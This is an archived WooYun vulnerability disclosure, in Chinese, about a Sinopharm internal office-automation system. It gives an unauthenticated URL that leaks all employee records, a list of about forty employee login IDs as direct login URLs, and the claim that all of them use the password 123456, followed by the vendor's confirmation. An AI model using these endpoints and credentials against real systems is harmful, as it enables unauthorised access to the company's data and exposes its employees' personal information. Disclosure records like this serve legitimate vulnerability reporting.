乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-24: 细节已通知厂商并且等待厂商处理中 2015-12-24: 厂商已经确认,细节仅向厂商公开 2016-01-03: 细节向核心白帽子及相关领域专家公开 2016-01-13: 细节向普通白帽子公开 2016-01-23: 细节向实习白帽子公开 2016-02-06: 细节向公众公开
国药集团
国药集团http://www.cnpicl.com.cn:8080/yyoa/信息泄漏http://www.cnpicl.com.cn:8080/yyoa/common/selectPersonNew/initData.jsp?trueName=1泄漏全部员工信息
http://www.cnpicl.com.cn:8080/yyoa/common/SelectPerson/reloadData.jsp
看下弱口令
http://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=chenjunhttp://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=chenweihttp://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=hechaohttp://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=hefenghttp://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=huangweihttp://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=hujinghttp://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=liangchaohttp://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=lihaiyinghttp://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=lileihttp://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=limingminghttp://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=liuqianghttp://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=liuruihttp://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=liushuaihttp://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=liuyanghttp://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=liuyonghttp://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=liuyuanhttp://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=liweihttp://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=lixiahttp://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=liyuanyuanhttp://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=wanghaiyanhttp://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=wanglihttp://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=wangnahttp://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=wangxiaodanhttp://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=wangxiaominghttp://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=wangzhiqianghttp://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=wuyinghttp://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=xuyinghttp://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=yangpinghttp://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=zhangchunmeihttp://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=zhanghanghttp://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=zhangminghuahttp://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=zhangshuohttp://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=zhangweihttp://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=zhangwenhuahttp://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=zhangyanhttp://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=zhaoganghttp://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=zhaojunhttp://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=zhouxinhttp://www.cnpicl.com.cn:8080/yyoa/indexPass.jsp?id=zhupeng
密码都是123456登陆一个看看可查看全部员工信息还有大量内部信息
还有大量内部信息
修改
危害等级:高
漏洞Rank:20
确认时间:2015-12-24 10:03
我们会及时处理
暂无